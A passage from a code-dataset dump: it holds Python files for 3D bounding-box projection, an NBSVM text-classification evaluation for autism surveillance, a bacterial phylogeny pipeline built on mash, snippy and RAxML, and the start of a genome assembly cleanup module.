normals[flip, :] = -normals[flip, :]
return normals
def get_corners_of_bb3d(basis, coeffs, centroid):
corners = np.zeros((8, 3))
# order the basis
index = np.argsort(np.abs(basis[:, 0]))[::-1]
# the case that two same value appear the same time
if index[2] != 2:
index[1:] = index[1:][::-1]
basis = basis[index, :]
coeffs = coeffs[index]
# Now, we know the basis vectors are orders X, Y, Z. Next, flip the basis vectors towards the viewer
basis = flip_towards_viewer(basis, centroid)
coeffs = np.abs(coeffs)
corners[0, :] = -basis[0, :] * coeffs[0] + basis[1, :] * coeffs[1] + basis[2, :] * coeffs[2]
corners[1, :] = basis[0, :] * coeffs[0] + basis[1, :] * coeffs[1] + basis[2, :] * coeffs[2]
corners[2, :] = basis[0, :] * coeffs[0] + -basis[1, :] * coeffs[1] + basis[2, :] * coeffs[2]
corners[3, :] = -basis[0, :] * coeffs[0] + -basis[1, :] * coeffs[1] + basis[2, :] * coeffs[2]
corners[4, :] = -basis[0, :] * coeffs[0] + basis[1, :] * coeffs[1] + -basis[2, :] * coeffs[2]
corners[5, :] = basis[0, :] * coeffs[0] + basis[1, :] * coeffs[1] + -basis[2, :] * coeffs[2]
corners[6, :] = basis[0, :] * coeffs[0] + -basis[1, :] * coeffs[1] + -basis[2, :] * coeffs[2]
corners[7, :] = -basis[0, :] * coeffs[0] + -basis[1, :] * coeffs[1] + -basis[2, :] * coeffs[2]
corners = corners + np.tile(centroid, (8, 1))
return corners
def get_corners_of_bb3d_no_index(basis, coeffs, centroid):
corners = np.zeros((8, 3))
coeffs = np.abs(coeffs)
corners[0, :] = -basis[0, :] * coeffs[0] + basis[1, :] * coeffs[1] + basis[2, :] * coeffs[2]
corners[1, :] = basis[0, :] * coeffs[0] + basis[1, :] * coeffs[1] + basis[2, :] * coeffs[2]
corners[2, :] = basis[0, :] * coeffs[0] + -basis[1, :] * coeffs[1] + basis[2, :] * coeffs[2]
corners[3, :] = -basis[0, :] * coeffs[0] + -basis[1, :] * coeffs[1] + basis[2, :] * coeffs[2]
corners[4, :] = -basis[0, :] * coeffs[0] + basis[1, :] * coeffs[1] + -basis[2, :] * coeffs[2]
corners[5, :] = basis[0, :] * coeffs[0] + basis[1, :] * coeffs[1] + -basis[2, :] * coeffs[2]
corners[6, :] = basis[0, :] * coeffs[0] + -basis[1, :] * coeffs[1] + -basis[2, :] * coeffs[2]
corners[7, :] = -basis[0, :] * coeffs[0] + -basis[1, :] * coeffs[1] + -basis[2, :] * coeffs[2]
corners = corners + np.tile(centroid, (8, 1))
return corners
def project_3d_points_to_2d(points3d, R_ex, K):
"""
Project 3d points from camera-centered coordinate to 2D image plane
Parameters
----------
points3d: numpy array
3d location of point
R_ex: numpy array
extrinsic camera parameter
K: numpy array
intrinsic camera parameter
Returns
-------
points2d: numpy array
2d location of the point
"""
points3d = R_ex.dot(points3d.T).T
x3 = points3d[:, 0]
y3 = -points3d[:, 1]
z3 = np.abs(points3d[:, 2])
xx = x3 * K[0, 0] / z3 + K[0, 2]
yy = y3 * K[1, 1] / z3 + K[1, 2]
points2d = np.vstack((xx, yy))
return points2d
def project_struct_bdb_to_2d(basis, coeffs, center, R_ex, K):
"""
Project 3d bounding box to 2d bounding box
Parameters
----------
basis, coeffs, center, R_ex, K
: K is the intrinsic camera parameter matrix
: Rtilt is the extrinsic camera parameter matrix in right hand coordinates
Returns
-------
bdb2d: dict
Keys: {'x1', 'x2', 'y1', 'y2'}
The (x1, y1) position is at the top left corner,
the (x2, y2) position is at the bottom right corner
"""
corners3d = get_corners_of_bb3d(basis, coeffs, center)
corners = project_3d_points_to_2d(corners3d, R_ex, K)
bdb2d = dict()
bdb2d['x1'] = int(max(np.min(corners[0, :]), 1)) # x1
bdb2d['y1'] = int(max(np.min(corners[1, :]), 1)) # y1
bdb2d['x2'] = int(min(np.max(corners[0, :]), 2*K[0, 2])) # x2
bdb2d['y2'] = int(min(np.max(corners[1, :]), 2*K[1, 2])) # y2
# if not check_bdb(bdb2d, 2*K[0, 2], 2*K[1, 2]):
# bdb2d = None
return bdb2d
``` |
{
"source": "82ndAirborneDiv/autism_surveillance",
"score": 2
} |
#### File: autism_surveillance/src/nbsvm.py
```python
import numpy as np
import pandas as pd
import GPy, GPyOpt
from sklearn.model_selection import train_test_split
from sklearn.metrics import brier_score_loss as brier_score
from sklearn.metrics import accuracy_score, f1_score
from scipy.sparse import load_npz
from stuff.models import NBSVM, simpleNBSVM
from stuff.tools import tfidf_to_counts
from stuff.metrics import binary_diagnostics
# Importing the data
filedir = 'C:/data/addm/'
seeds = np.array(pd.read_csv(filedir + 'seeds.csv')).flatten()
corpus = pd.read_csv(filedir + 'corpus_with_lemmas_clean.csv')
doctermat = load_npz(filedir + 'doctermat.npz')
# Setting the features and targets
X = tfidf_to_counts(np.array(doctermat.todense(),
dtype=np.uint16))
y = np.array(corpus.aucaseyn, dtype=np.uint8)
n_range = range(corpus.shape[0])
# Toggle for the optimization loop
optimize = False
opt_iter = 30
if optimize:
# Regular function for hyperparameter evaluation
def evaluate_hps(beta, C):
mod = NBSVM(C=C, beta=beta)
mod.fit(X[train], y[train])
guesses = mod.predict(X[val]).flatten()
final_score = 1 - accuracy_score(y[val], guesses)
params = np.array([beta, C])
print('Params were ' + str(params))
print('Error was ' + str(final_score) + '\n')
return final_score
# Bounds for the GP optimizer
bounds = [{'name': 'beta',
'type': 'continuous',
'domain': (0.8, 1.0)},
{'name': 'C',
'type': 'discrete',
'domain': (0.001, 0.01, 1.0, 2, 2**2)}
]
# Function for GPyOpt to optimize
def f(x):
print(x)
eval = evaluate_hps(beta=float(x[:, 0]),
C=float(x[:, 1]))
return eval
# Running the optimization
train, val = train_test_split(n_range,
test_size=0.3,
stratify=y,
random_state=10221983)
opt_mod = GPyOpt.methods.BayesianOptimization(f=f,
num_cores=20,
domain=bounds,
initial_design_numdata=5)
opt_mod.run_optimization(opt_iter)
best = opt_mod.x_opt
# Saving the best parameters to CSV
pd.Series(best).to_csv(filedir + 'models/best_nbsvm_params.csv',
index=False)
# Running the splits
stats = pd.DataFrame(np.zeros([10, 15]))
for i, seed in enumerate(seeds):
train, test = train_test_split(n_range,
stratify=y,
random_state=seed,
test_size=0.3)
if i == 0:
test_guesses = pd.DataFrame(np.zeros([X[test].shape[0], 10]))
# Fitting the model
mod = simpleNBSVM(C=0.001)
print('Fitting model ' + str(i))
mod.fit(X[train], y[train])
# Getting the predicted probs and thresholded guesses
guesses = mod.predict(X[test]).flatten()
test_guesses.iloc[:, i] = guesses
bin_stats = binary_diagnostics(y[test], guesses, accuracy=True)
print(bin_stats)
stats.iloc[i, :] = bin_stats.values
# Writing the output to CSV
stats.columns = ['tp', 'fp', 'tn', 'fn', 'sens', 'spec', 'ppv', 'npv',
'f1', 'acc', 'true', 'pred', 'abs', 'rel', 'mcnemar']
stats.to_csv(filedir + 'stats/nbsvm_simple_stats.csv',
index=False)
test_guesses.to_csv(filedir + 'guesses/nbsvm_simple_test_guesses.csv',
index=False)
``` |
{
"source": "82ndAirborneDiv/BMGAP",
"score": 2
} |
#### File: data-api/phylo_tree_scripts/build_phylo.py
```python
import sys
from Bio import SeqIO
from Bio.Phylo.TreeConstruction import DistanceCalculator
from Bio.Phylo.TreeConstruction import _DistanceMatrix
from Bio.Phylo.TreeConstruction import DistanceTreeConstructor
from Bio import Phylo
import os
import string
import re
import operator
import csv
import pprint as pp
import locale
import argparse
import datetime
import json
import time
import shutil
import math
import collections
import urllib3
from multiprocessing import Pool,Process, Queue
import tempfile
import sqlite3
from random import randint
from subprocess import *
from scipy import stats
import numpy as np
from operator import attrgetter
#import matplotlib.pyplot as plt
encoding = locale.getdefaultlocale()[1]
http = urllib3.PoolManager()
##PATHS###
SCRIPT_PATH = os.path.realpath(__file__)
DIR_PATH = os.path.dirname(SCRIPT_PATH)
home_dir = os.path.expanduser("~")
mask_map_script = "{}/ML/tools/mask_mapped_aln/mask_mapped_aln.py".format(home_dir)
adjust_size_script = "{}/ML/tools/mask_mapped_aln/adjust_partition_size.py".format(home_dir)
pacbio_ref_sketch = "{}/ML/Projects/NadavTopaz/Scripts/lib/pacbio_references.msh".format(home_dir)
reference_files = "{}/ML/Projects/NadavTopaz/Scripts/reference_pacbios".format(home_dir)
#GENOME_DIR = "{}/ML/Projects/NadavTopaz/All_nm/fastas".format(home_dir)
# print(home_dir)
# print(mask_map_script)
# print(GENOME_DIR)
# print(adjust_size_script)
OUTPUT_DIR = ""
VERBOSITY = False
weights = {"1":1.0,
"2":0,
"3":0}
fasta_extensions = [".fa",".fasta",".fna"]
def set_output(output):
global OUTPUT_DIR
OUTPUT_DIR = output
if os.path.isdir(output):
print("Output Directory",output,"aleady exists, not creating")
else:
os.system("mkdir {}".format(output))
print("Created Output Directory",output)
def pick_reference(query_sketch,threads):
mash_results = check_output(["mash","dist","-p",threads,pacbio_ref_sketch,query_sketch],shell=False)
mash_result = re.split(b"\n",mash_results.rstrip())
current_min = 100.0
current_ref = ""
for line in mash_result:
line = line.decode(encoding)
ref_assembly = line.split("\t")[0]
query_name = line.split("\t")[1]
mash_dist = float(line.split("\t")[2])
if mash_dist < current_min:
current_min = mash_dist
current_ref = ref_assembly
ref_path = os.path.join(reference_files,current_ref)
return ref_path
def pick_genomes(query_sketch,mash_db,threads,max_num,force_max):
print("Calculating Distances")
mash_results_dict = {}
mash_results = check_output(["mash","dist","-p",threads,mash_db,query_sketch],shell=False)
mash_result = re.split(b"\n",mash_results.rstrip())
seen_basenames = []
counts = {}
for line in mash_result:
query_name = line.decode(encoding).split("\t")[1]
query_name = os.path.basename(query_name)
if query_name not in mash_results_dict:
mash_results_dict[query_name] = {"mash_results":{},"mash_dists":[]}
hit = line.decode(encoding).split("\t")[0]
if "/" in hit:
hit_path = hit
hit = os.path.basename(hit)
if "_" in hit:
hit_basename = hit.split("_")[0]
else:
hit_basename = hit
if "_" in query_name:
query_basename = query_name.split("_")[0]
if query_basename == hit_basename:
continue
if query_name == hit:
continue
mash_dist = float(line.decode(encoding).split("\t")[2])
p_val = line.decode(encoding).split("\t")[3]
match_hash = line.decode(encoding).split("\t")[4]
mash_score = mash_dist
mash_results_dict[query_name]["mash_results"][hit] = {"score":mash_score,"p_val":p_val,"hash":match_hash,"hit":hit,"path":hit_path}
mash_results_dict[query_name]["mash_dists"].append(mash_score)
final_genomes = {"all_genomes":[],"details":{}}
for query in mash_results_dict:
scores_set = []
for hit,_ in sorted(mash_results_dict[query]["mash_results"].items(),key=lambda x: float(x[1]["score"])):
score = mash_results_dict[query]["mash_results"][hit]["score"]
if score not in scores_set:
scores_set.append(score)
a = np.asarray(scores_set)
count = 0
for hit,_ in sorted(mash_results_dict[query]["mash_results"].items(),key=lambda x: float(x[1]["score"])):
if hit not in final_genomes["all_genomes"]:
score = mash_results_dict[query]["mash_results"][hit]["score"]
if count < max_num:
hit_path = mash_results_dict[query]["mash_results"][hit]["path"]
final_genomes["all_genomes"].append(hit_path)
final_genomes["details"][hit] = {"query":query,"dist":score}
count+=1
print(final_genomes["all_genomes"])
print(len(final_genomes["all_genomes"]))
final_scores = []
for query in mash_results_dict:
for genome in final_genomes["details"]:
score = mash_results_dict[query]["mash_results"][genome]["score"]
final_scores.append(score)
#print(genome,score)
#print(sorted(final_scores))
#~ plt.savefig("hist.svg",format="svg")
#final_genomes["query"] = query_name
return final_genomes
def mash_sketch(threads,genome_dir,temp_dir,sketch_info):
print("Running Mash")
threads = threads
kmer_size = 32
sketch_size = 10000
sketch_info_dict = {}
call(["mash sketch -k {} -p {} -s {} -o {} {}/*".format(kmer_size,threads,sketch_size,os.path.join(temp_dir,"nm_sketch"),genome_dir)], shell=True)
sketch_info_dict["path"] = temp_dir+"/nm_sketch.msh"
sketch_info = {"sketch_dict":sketch_info_dict,"temp_dir":temp_dir}
return sketch_info
def mash_sketch_list(threads,mash_assembly_list,output_dir,proj_name,temp_dir):
print("Running Mash")
kmer_size = 32
sketch_size = 10000
with open(os.path.join(temp_dir,"temp_assembly_list"),"w") as f:
for obj in mash_assembly_list:
f.write("{}\n".format(obj))
mash_assembly_list = os.path.join(temp_dir,"temp_assembly_list")
unique_time = str(time.time()).split(".")[1]
out_sketch_name = "{}_{}".format("BMGAP_DATA_MASH_DB",unique_time)
output_sketch = os.path.join(output_dir,out_sketch_name)
call(["mash sketch -k {} -p {} -l {} -s {} -o {}".format(kmer_size,threads,mash_assembly_list,sketch_size,output_sketch)], shell=True)
call(["rm {}".format(mash_assembly_list)], shell=True)
return("{}.msh".format(output_sketch))
def make_mash_matrix(threads,genome_list,output_dir,proj_name,temp_dir):
print("Running Mash")
kmer_size = 32
sketch_size = 10000
with open(os.path.join(temp_dir,"temp_assembly_list"),"w") as f:
for obj in genome_list:
f.write("{}\n".format(obj))
mash_assembly_list = os.path.join(temp_dir,"temp_assembly_list")
unique_time = str(time.time()).split(".")[1]
out_sketch_name = "{}_{}".format(proj_name,unique_time)
output_sketch = os.path.join(output_dir,out_sketch_name)
call(["mash sketch -k {} -p {} -l {} -s {} -o {}".format(kmer_size,threads,mash_assembly_list,sketch_size,output_sketch)], shell=True)
call(["rm {}".format(mash_assembly_list)], shell=True)
output_sketch = "{}.msh".format(output_sketch)
mash_results = check_output(["mash","dist","-p",threads,output_sketch,output_sketch],shell=False)
mash_result = re.split(b"\n",mash_results.rstrip())
headers = []
data_set = {}
for line in mash_result:
line = line.decode(encoding)
query = line.split("\t")[0]
query = os.path.basename(query)
query = query.split(".")[0]
subject = line.split("\t")[1]
subject = os.path.basename(subject)
subject = subject.split(".")[0]
score = float(line.split("\t")[2])
if query not in data_set:
data_set[query] = {}
if subject not in data_set[query]:
data_set[query][subject] = score
if query not in headers:
headers.append(query)
i=0
final_text="\t"
header_dict={}
for query in sorted(headers):
header_dict[i] = query
i+=1
final_text+="{}\t".format(query)
final_text+="\n"
final_text.replace("\t\n","\n")
for query in sorted(data_set):
final_text+="{}\t".format(query)
for i in range(0,len(headers)):
current_score = data_set[query][header_dict[i]]
final_text+="{}\t".format(current_score)
final_text+="\n"
final_text.replace("\t\n","\n")
return(final_text)
def call_snippy(ref,file_path):
entry = file_path.split("/")[-1]
if ".fasta" in entry:
entry_name = entry.replace(".fasta","")
else:
entry_name = entry
if "_" in entry_name:
entry_name = entry_name.split("_")[0]
call(["snippy","--outdir",os.path.join(OUTPUT_DIR,"snippy_dir","{}".format(entry_name)),"--cpus","1","--ref",ref,"--ctgs",file_path,"--force"],shell=False)
#call(["snippy","--outdir",os.path.join(OUTPUT_DIR,"snippy_dir","{}".format(entry_name)),"--cpus","1","--ref",ref,"--ctgs",file_path],shell=False)
return True
def snippy_check(snippy_dir):
total_size = 0.0
i=0
size_dict = {}
redo_list = []
for snp_file in os.listdir(snippy_dir):
file_path = os.path.join(snippy_dir,snp_file)
size = os.stat(file_path).st_size
total_size += float(size)
i+=1
size_dict[snp_file] = size
avg_size = float(total_size/i)
for obj in size_dict:
if size_dict[obj] < avg_size:
redo_list.append(obj)
return redo_list
def run_snippy(final_genomes,threads,query_assemblies,dir_flag):
processes = int(threads)
pool = Pool(processes)
snippy_dir = os.path.join(OUTPUT_DIR,"snippy_dir")
snippy_list = []
if os.path.isdir(snippy_dir):
print("Snippy Directory",snippy_dir,"aleady exists, not creating")
else:
os.system("mkdir {}".format(snippy_dir))
print("Created Output Directory",snippy_dir)
for file_path in final_genomes["all_genomes"]:
snippy_list.append(file_path)
for file_path in query_assemblies:
snippy_list.append(file_path)
ref = final_genomes["ref"]
snippy_time = [pool.apply_async(call_snippy,args=(ref,in_file)) for in_file in snippy_list]
output = [result.get() for result in snippy_time]
pool.terminate()
redo_list = snippy_check(snippy_dir)
if len(redo_list) > 0:
for obj in redo_list:
for item in snippy_list:
if obj in item:
call_snippy(ref,item)
return snippy_dir
# def update_mash_sketch(mash_db,assembly_list):
# mash_info_assemblies = {}
# mash_info = check_output(["mash info {}".format(mash_db)],shell=True)
# pp.pprint(mash_info)
# mash_info = mash_info.decode(encoding)
# mash_info_lines = mash_info.split("\n")
# print(mash_info_lines)
# for line in mash_info_lines:
# print(line)
# if line.strip() == "":
# continue
# else:
# if "[Hashes]" in line:
# continue
# line = line.replace(" ","***")
# line_items_pre = line.split("***")
# line_items = []
# for obj in line_items_pre:
# if obj.strip() != "":
# line_items.append(obj)
# if len(line_items) == 4:
# mash_info_assemblies[line_items[2]] = ""
# pp.pprint(mash_info_assemblies)
# check_set = []
# for genome_file_path in assembly_list:
# genome_file = genome_file_path.split("\\")[-1]
# if genome_file not in mash_info_assemblies:
# check_set.append(genome_file_path)
# return(check_set)
# def paste_sketch(threads,mash_db,input_file,temp_dir):
# print("Running Mash")
# threads = threads
# in_file_name = input_file.split("\\")[-1]
# kmer_size = 32
# sketch_size = 10000
# call(["mash sketch -k {} -p {} -s {} -o {} {}".format(kmer_size,threads,sketch_size,os.path.join(temp_dir,"input_sketch.msh"),input_file)], shell=True)
# sketch_path = os.path.join(temp_dir,"input_sketch.msh")
# call(["mash paste {} {}".format(mash_db,sketch_path)],shell=True)
# print("added {} to mash db".format(in_file_name))
# call(["rm {}".format(os.path.join(temp_dir,"input_sketch.msh"))],shell=True)
def call_bmgap_api():
final_data = {} #set up dict to hold our final data
#since there is no direct way to filter by run using the API yet, we will use a different approach
#we will pull all of the data from BMGAP, and then filter it ourselves by the run that we want
#since there is no way to pull all of the data from BMGAP, we will do one API call with default settings to get the count the total # of records, then another to pull all of those records
url_1 = 'http://amdportal-sams.cdc.gov/bmgap-api/samples' #first url
#this is the actual API request below. REST APIs usually have two options (GET and POST). GET is when we want to get data, POST is when we want to submit data. Either one can also return data.
request = http.request("GET",url_1) #request is a httpresponse object, we want the data stored in it, and we want to decode it from bytes to utf-8 unicode
request_data = json.loads(request.data.decode('utf-8')) #this handles the decoding, and it converts the json to a python dictionary "request_data"
#pp.pprint(request_data) #print the data we got
#for category in request_data:
# print(category) #this shows us that there are three main categories in the data, "docs", "total" and "limit" - the docs store the record data, and total tells us how many records exist in BMGAP, limit is set to 50 by default
total_records = request_data["total"] #get total record count
pages = math.ceil(total_records/1000)
#print(pages)
print("grabbing {} BMGAP records across {} pages".format(total_records,pages)) #print how many records we will get in the next API call
#print(type(total_records)) #make sure "total_records" is an integeter and not a string, and it is an int
merged_data = []
for i in range(1,pages+1):
print("getting page {}".format(i))
url_2 = 'http://amdportal-sams.cdc.gov/bmgap-api/samples?page={}&perPage={}'.format(i,1000) #Now that we know how many records exist, we will pull them all by adding the perPage filter
request = http.request("GET",url_2)
#pp.pprint(request.data.decode('utf-8'))
request_data = json.loads(request.data.decode('utf-8')) #override our previous request_data with the total records
#for record in request_data["docs"]: #now that we know that we want to loop through docs, we do so here and print each record
# pp.pprint(record)
merged_data.append(request_data["docs"])
#time.sleep(60)
total = 0
for obj in merged_data:
for record in obj:
total+=1
print("got {} BMGAP records".format(total)) #make sure we got them all by printing the count of the records
for obj in merged_data:
for record in obj:
if "mash" in record:
if "QC_flagged" in record: #if the record has been QC flagged
if record["QC_flagged"]: #true means it was flagged as bad quality
continue #skip
else:
if "assemblyPath" in record:
assembly_path = record["assemblyPath"]
#orig_assembly_file = assembly_path.split("/")[-1]
#assembly_file = orig_assembly_file.replace("-","_")
#assembly_path = os.path.join(assembly_path.replace(orig_assembly_file,""),assembly_file)
else:
continue
lab_id = record["Lab_ID"]
bmgap_id = record["identifier"]
assembly_file = assembly_path.split("/")[-1]
final_data[bmgap_id] = {"lab_id":lab_id,"assembly_path":assembly_path,"assembly_file":assembly_file}
#pp.pprint(final_data)
#print(len(final_data))
return final_data
def error(error_dict):
for error in error_dict:
print(error_dict[error],error)
exit()
def main():
### Main Arg Parse ###
parser = argparse.ArgumentParser(description="Automated Phylogeny Builder v1")
parser.add_argument('-d','--indir',help="Input Directory: Directory of FASTA files to analyze")
parser.add_argument('-o','--out',help="Output Directory", required=True)
parser.add_argument('-t','--threads',help="Number of max threads to use (default=1)",default="1")
parser.add_argument('-b','--mash_db',help="Provide prebuilt mash DB, otherwise build from scratch")
parser.add_argument('-f','--fast',help="Fast option for distance based neighbor joining tree", action="store_true")
parser.add_argument('-m','--max_num',help="Maximum number of isolates to include (default=50)",default="50")
parser.add_argument('-g','--genomes',help="Provide genome directory to build tree with instead of automatically picking, requires -r flag")
parser.add_argument('-r','--reference',help="Required with -g flag; provide reference to use for phylogeny when providing genome directory")
parser.add_argument('-s','--snippy',help="existing snippy dir, requires -g and -r")
parser.add_argument('-p','--proj_name',help="project prefix - will be used to label all files associated with project", required=True)
args = vars(parser.parse_args())
start_time = time.time()
### Print Args ###
print ("Running with the following parameters:")
for arg in args:
print (arg,":",args[arg])
### Set Output (Create if doesn't exist already) ###
set_output(args["out"])
### Initialize variables ###
automatic_selection = True
threads = args["threads"]
q_dict = {}
sketches_dict = {}
sketches = []
sketch_info = {}
results_dict = {}
thresholds = {}
error_dict = {}
temp_dir = tempfile.mkdtemp()
project_name = args["proj_name"]
dir_flag = False
mash_assembly_list = []
max_num = int(args["max_num"])
if args["fast"]:
need_ref = False
else:
need_ref = True
if args["mash_db"]:
mash_db = args["mash_db"]
if args["indir"]:
input_dir = args["indir"]
query_assemblies = []
if args["snippy"]:
if not args["genomes"]:
error_dict["snippy dir provided without genome dir, exiting"] = "Input error: "
error(error_dict)
if not args["reference"]:
error_dict["snippy dir provided without reference, exiting"] = "Input error: "
error(error_dict)
automatic_selection = False
if args["genomes"] and args["reference"]:
input_dir = args["genomes"]
reference = args["reference"]
dir_flag = True
automatic_selection = False
if args["genomes"] and not args["reference"]:
error_dict["Genome dir provided without reference, exiting"] = "Input error: "
error(error_dict)
if args["reference"] and not args["genomes"]:
error_dict["Reference provided without genome directory, exiting"] = "Input error: "
error(error_dict)
in_file_counter = 0
for in_file in os.listdir(input_dir):
in_file_path = os.path.join(input_dir,in_file)
query_assemblies.append(in_file_path)
in_file_counter +=1
max_num_per_query = (max_num-in_file_counter)/in_file_counter
query_sketch = mash_sketch_list(threads,query_assemblies,OUTPUT_DIR,project_name,temp_dir)
if need_ref:
ref_path = pick_reference(query_sketch,threads)
if not args["mash_db"]:
bmgap_data = call_bmgap_api()
for record in bmgap_data:
mash_assembly_list.append(bmgap_data[record]["assembly_path"])
mash_db = mash_sketch_list(threads,mash_assembly_list,OUTPUT_DIR,project_name,temp_dir)
if automatic_selection:
final_genomes = pick_genomes(query_sketch,mash_db,args["threads"],int(max_num_per_query),force_max)
if need_ref:
final_genomes["ref"] = ref_path
print(ref_path)
else:
final_genomes = {"all_genomes":[],"details":{},"ref":args["reference"]}
for infile in os.listdir(args["genomes"]):
for ext in fasta_extensions:
if ext in infile:
infile_path = os.path.join(args["genomes"],infile)
if infile_path not in final_genomes["all_genomes"]:
final_genomes["all_genomes"].append(infile_path)
continue
#pp.pprint(final_genomes)
if not args["fast"]:
if not args["snippy"]:
snippy_dir = run_snippy(final_genomes,args["threads"],query_assemblies,dir_flag)
else:
snippy_dir = args["snippy"]
redo_list = snippy_check(snippy_dir)
for obj in redo_list:
print(obj)
for genome in os.listdir(input_dir):
print(genome)
if obj in genome:
print("found")
redo_obj = os.path.join(genome_dir,genome)
call_snippy(reference,redo_obj)
call(["snippy-core --prefix={}_core --aformat=fasta {}/*".format(project_name,snippy_dir)], shell=True)
p2 = Popen(["mv {}_core* {}".format(project_name,snippy_dir)], shell=True)
p2.wait()
p3 = Popen(["python3 {} {}/{}_core.full.aln -o {}".format(mask_map_script,snippy_dir,project_name,OUTPUT_DIR)], shell=True)
p3.wait()
masked_aln_file = "{}/{}_core.full_masked.aln".format(OUTPUT_DIR,project_name)
partition_file = "{}/{}_core.full_partition.txt".format(OUTPUT_DIR,project_name)
print("gubbins")
p4 = Popen(["run_gubbins.py -c {} -i 10 -u -p {}/gubbins_masked -v -t raxml {}".format(args["threads"],OUTPUT_DIR,masked_aln_file)], shell=True)
p4.wait()
gubbins_phylip_file = "{}/gubbins_masked.filtered_polymorphic_sites.phylip".format(OUTPUT_DIR)
p5 = Popen(["python3 {} {} {}".format(adjust_size_script,gubbins_phylip_file,partition_file)], shell=True)
p5.wait()
abs_output = os.path.abspath(OUTPUT_DIR)
print("raxml")
p6 = Popen(["raxmlHPC-PTHREADS -s {} -w {} -n {}_out --asc-cor=stamatakis -q {} -m GTRGAMMAX -T {} -N autoMRE -p 6420662893125220392 -f a -x 7125452922221827660".format(gubbins_phylip_file,abs_output,project_name,partition_file,args["threads"])], shell=True)
p6.wait()
else:
mash_matrix = make_mash_matrix(threads,final_genomes["all_genomes"],OUTPUT_DIR,project_name,temp_dir)
# with open("test_out.txt","w") as f:
# f.write(mash_matrix)
i=2
matrix = []
names = []
firstLine = True
mash_matrix_lines = mash_matrix.split("\n")
for line in mash_matrix_lines:
if line.strip() != "":
if firstLine:
print(line)
current_names = line.split("\t")
for obj in current_names:
if len(obj) > 0:
names.append(obj)
firstLine = False
else:
sub_matrix = []
values = line.split("\t")
for q in range(1,i):
val = float(values[q])
sub_matrix.append(val)
matrix.append(sub_matrix)
i+=1
#print(names)
#print(len(names),len(matrix))
print("building tree")
dm = _DistanceMatrix(names,matrix)
constructor = DistanceTreeConstructor(method="nj")
tree = constructor.nj(dm)
Phylo.write([tree],"my_tree.tree","newick")
if __name__ == "__main__":
main()
```
#### File: pipeline/AssemblyCleanup/AssemblyCleanup.py
```python
SCRIPT_VERSION = 1
SCRIPT_SUBVERSION = 23
#pylint: disable=global-statement, broad-except
import re
import pandas as pd
from Bio import SeqIO, SeqRecord
import os
import sys
# import gzip
# import zlib
# import stat
import time
# from shutil import copyfile
# from collections import defaultdict
# import itertools
# import functools
# import urllib.request
import utilities
import seq_utilities
import BLASThelpers
from BLASThelpers import BLASTheaders as bh
from Bio.Blast.Applications import NcbiblastnCommandline
import shlex
import NGS_data_utilities
import AssemblyStats
from MauveHelper import MauveHelper, mauve_jar
script_base = os.path.basename(__file__)
_outputBase = '{}_v{}.{}'.format(os.path.splitext(script_base)[0],SCRIPT_VERSION,SCRIPT_SUBVERSION)
my_file = __file__
if os.path.islink(my_file):
my_file = os.path.realpath(my_file)
SCRIPT_DIR, SCRIPT_NAME = os.path.split(my_file)
SCRIPT_DIR = os.path.abspath(SCRIPT_DIR)
ContigHeaders = ['Contig_ID','Length','Coverage','Contig']
RO_argset = set(['circle_new_start','reverse_contig','closed_circle','broken_circle','circularize_with_Ns','reference'])
DIS_argset = set(['length','coverage','assembler','Mean_Coverage'])
# def cleanup_SPADES_folder(input_folder,output_folder, **kwargs):
# utilities.safeMakeDir(output_folder)
# for filename in os.listdir(input_folder):
# if filename.endswith('.fasta'):
# in_file = os.path.join(input_folder,filename)
# base = os.path.basename(filename)
# out_file = os.path.join(output_folder,base)
# kwargs['export_contig_data'] = out_file+'_ContigStats.csv' ##Override any that was passed, since we have multiple files
# cleanup_SPADES_file(in_file,out_file,**kwargs)
# def cleanup_SPADES_file(input_file, output_file, **kwargs):
# with open(input_file,'rt') as fin:
# seqs = [c for c in SeqIO.parse(fin,'fasta')]
# cleaned = cleanup_SPADES(seqs,**kwargs)
# with open(output_file,'wt') as fout:
# SeqIO.write(cleaned,fout,'fasta')
def cleanup_SPADES(contigs,minimum_length, minimum_coverage, export_contig_data=None,discard_file=None,export_contig_graph=None):
contig_table = AssemblyStats.parse_SPADES(contigs,export_contig_graph=export_contig_graph,export_contig_data=export_contig_data)
good_length = contig_table['Contig_Size'] > minimum_length
if (contig_table.Coverage.isnull().any()):
raise Exception("Null value in coverage table during Assembly Cleanup. Unable to filter")
good_contig_bool = good_length
else:
good_coverage = contig_table['Coverage'] > minimum_coverage
good_contig_bool = good_coverage & good_length
good_contig_table = contig_table[good_contig_bool]
good_contigs = good_contig_table['Contig'].tolist()
if discard_file is not None:
try:
discard_contigs = contig_table[~good_contig_bool]['Contig'].tolist()
SeqIO.write(discard_contigs,discard_file,utilities.guessFileFormat(discard_file)[0])
except Exception as e:
print(e)
raise
return good_contigs
## set format for BLAST tabular output
_BLASTheaderList = ['qseqid','sseqid','length','qcovhsp','qstart','qend','qlen','sstart','send','slen','qcovs',
'evalue','bitscore','pident','sstrand']
_outfmt_str, _outfmt_head = BLASThelpers.BLASTtableCommandAndHeaders(_BLASTheaderList)
### This reorients closed circular contigs so that they start at the same place as a reference contig
### This was intended for both raw and reference to be single contigs, but it is not necessary (though multi-contig is untested)
## Raw_contig is a list of SeqRecords (should be single)
## Reference file is the sequence file that you want to align to
def reorientClosedChromosome(raw_contig,reference_file,N_padding=-1,working_dir=None,set_steps=5,set_window=5000):
temp_dir = None
if isinstance(working_dir,str):
try:
utilities.safeMakeDir(working_dir)
temp_dir = working_dir
except IOError:
pass ##Leave temp_dir as None
if temp_dir is None:
temp_dir = utilities.safeMakeOutputFolder('AssemblyCleanup_temp_')
## Setup blast database for the sequences you are searching against
raw_contig_dict = SeqIO.to_dict(raw_contig)
raw_contig_file = os.path.join(temp_dir,utilities.makeSafeName("-".join(raw_contig_dict.keys())))
SeqIO.write(raw_contig,raw_contig_file,'fasta')
db_name = os.path.join(temp_dir,os.path.basename(raw_contig_file))
BLASThelpers.makeblastdb(raw_contig_file)
##Get several chunks near the beginning of the reference file, as query
ref_seqs = seq_utilities.seqs_guess_and_parse2list(reference_file)
for rs in ref_seqs:
rename = re.sub('\W','_',rs.name)
steps = set_steps
window = set_window
expected_search_length = steps * window - 1
if len(rs) < expected_search_length:
steps = len(rs) // window
if steps == 0:
steps = 1
window = len(rs)
search_length = steps * window
print("Reference sequence is only {}bp; dropping search sequence from {} to {}".format(len(rs),expected_search_length,search_length))
else:
search_length = expected_search_length
SearchWindows = []
for i in range(0,search_length,window):
end_base = i + window
contig = rs[i:end_base]
contig.id = 'fragment_{}_to_{}'.format(i,end_base)
SearchWindows.append(contig)
